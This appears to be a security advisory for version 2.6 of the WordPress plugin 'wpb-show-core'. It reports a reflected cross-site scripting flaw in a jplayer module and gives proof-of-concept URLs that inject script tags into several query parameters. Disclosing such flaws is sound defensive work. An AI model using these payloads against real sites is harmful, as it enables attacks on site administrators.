Description The plugin does not sanitise and escape some parameters before outputting them back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin
https://example.com/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php?podcastName=<script>alert(1337)</script> https://example.com/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php?podcastSlug="><script>alert(1337)</script>// https://www.example.com/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php?title=1-18-24<script>alert(1337)</script>&podcastName;=Lightning+Thursdays&podCastImage;=https%3A%2F%2Fdehayf5mhw1h7.cloudfront.net%2Fwp-content%2Fuploads%2Fsites%2F874%2F2018%2F03%2F26232451%2Fhendersonville-lightning.png&podcastSlug;=lightning-thursdays&siteurl;=https%3A%2F%2Fwww.example.com&fileList;[0][id]=49824&fileList;[0][mp3]=https%3A%2F%2Fdehayf5mhw1h7.cloudfront.net%2Fwp-content%2Fuploads%2Fsites%2F874%2F2024%2F01%2F18105309%2FLightning-TODAY-1-18-24.mp3&fileList;[0][title]=1-18-241-2<script>alert(1337)</script>&fileList;[0][actual_mp3]=&blogid;=874&rss;_feed_link=https%3A%2F%2Fwww.example.com%2Fpodcast%2Flightning-thursdays%2Ffeed%2F%3Fpost_type%3Depisode&podImg;_URL=https%3A%2F%2Fdehayf5mhw1h7.cloudfront.net%2Fwp-content%2Fuploads%2Fsites%2F874%2F2018%2F03%2F26232451%2Fhendersonville-lightning.png&podCastId;=78&episodeId;=49824&audioPlayerOption;=advance&gmf;=-5&ckd;=www.example.com&embedFlag;=podcast
CPE | Name | Operator | Version |
---|---|---|---|
eq | 2.6 |